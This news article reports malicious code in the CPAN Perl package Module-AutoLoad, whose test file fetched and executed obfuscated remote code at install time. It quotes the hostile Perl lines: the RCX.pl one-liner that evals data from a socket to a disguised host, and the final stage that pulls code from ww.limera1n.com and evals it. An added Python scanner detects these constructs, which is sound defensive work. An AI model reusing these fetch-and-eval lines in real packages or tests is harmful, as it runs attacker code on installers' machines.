Malicious code detected in the Module-AutoLoad Perl package

Malicious code has been identified in Module-AutoLoad, a Perl package distributed through the CPAN directory and designed to load CPAN modules automatically on the fly. The malicious insert was found in the test code 05 rx.t, which has shipped since 2011.
It is noteworthy that questions about the loading of questionable code came up on Stackoverflow back in 2016.

The malicious activity boils down to an attempt to download and execute code from a third-party server (http://r.cx:1/) while the test suite runs, which happens when the module is installed. It is assumed that the code originally downloaded from the external server was not malicious, but the request is now redirected to the ww.limera1n.com domain, which supplies its own portion of code for execution.

To set up the download, the file 05 rx.t uses the following code:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

This code causes the script ../contrib/RCX.pl to be executed, the contents of which boil down to the line:

use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};

This script loads code obfuscated with the perlobfuscator.com service from the external host r.cx (the character codes 82.46.99.88 correspond to the text "R.cX") and executes it in an eval block.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

After unpacking, the following code is what ultimately gets executed:

print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak
";evalor return warn $@while$b;1
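A static check for the constructs described above, as an added example that is not part of the original article or of the module: it flags a test that launches another script through `$^X`, `eval` applied to data read from a handle, `eval unpack u=>`, and a v-string used as a socket host, decoding the v-string to reveal the hidden name. Rule and function names are hypothetical; the sample inputs are the snippets quoted in the article, with the encoded payload replaced by a placeholder.

```python
import re

# Added example: heuristic rules for the constructs described in this article.
# Rule names and function names are hypothetical, not from any existing tool.
RULES = {
    "eval-from-handle": re.compile(r"\beval\s*<\s*\$\w+\s*>"),    # eval<$b>
    "eval-uuencoded": re.compile(r"\beval\s+unpack\s+u\s*=>"),    # eval unpack u=>q{...}
    "runs-perl-via-backticks": re.compile(r"`[^`]*\$\^X[^`]*`"),  # `$^X $prog`
    "network-socket": re.compile(r"\bIO::Socket::INET\b"),
}
# Bare dotted number literal (not inside quotes): Perl treats it as a v-string.
VSTRING = re.compile(r"(?<![\w.\"'])\d{1,3}(?:\.\d{1,3}){2,}(?!\w)")

def decode_vstring(literal):
    """A Perl v-string is the string of characters with these code points."""
    return "".join(chr(int(n)) for n in literal.split("."))

def scan(source):
    """Return (line number, rule, detail) for every suspicious construct."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append((lineno, rule, None))
        if RULES["network-socket"].search(line):
            for m in VSTRING.finditer(line):
                host = decode_vstring(m.group(0))
                # Printable ASCII means the "number" is really hidden text.
                if all(32 <= ord(c) < 127 for c in host):
                    findings.append((lineno, "vstring-host", host))
    return findings

# Sample inputs: snippets quoted in the article (payload replaced by a placeholder).
SAMPLE_TEST = r'''my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
'''
SAMPLE_RCX = r'''use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};'''
SAMPLE_STAGE = r'''eval unpack u=>q{PLACEHOLDER}'''

if __name__ == "__main__":
    for name, src in [("05 rx.t", SAMPLE_TEST), ("RCX.pl", SAMPLE_RCX), ("stage", SAMPLE_STAGE)]:
        for finding in scan(src):
            print(name, *finding)
```

Quoted addresses such as "192.168.1.10:80" are reported only as `network-socket`, since a quoted string is not a v-string.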

The problematic package has now been removed from the PAUSE repository (Perl Authors Upload Server), and the module author's account has been blocked. However, the module is still available in the MetaCPAN archive and can be installed directly from MetaCPAN with some utilities such as cpanminus. It is noted that the package was not widely used.

Interestingly, the author of the module also joined the discussion. The author denied the claim that the malicious code was inserted after the site "r.cx" was hacked, and explained that it was just for fun and that perlobfuscator.com was used not to hide anything, but to reduce the size of the code and to make it easier to copy via the clipboard. The choice of the function name "botstrap" was explained by the fact that this word "sounds like bot and is shorter than bootstrap." The module's author also gave assurances that the identified manipulations do not perform malicious actions, but only demonstrate loading and executing code over TCP.

Source: opennet.ru
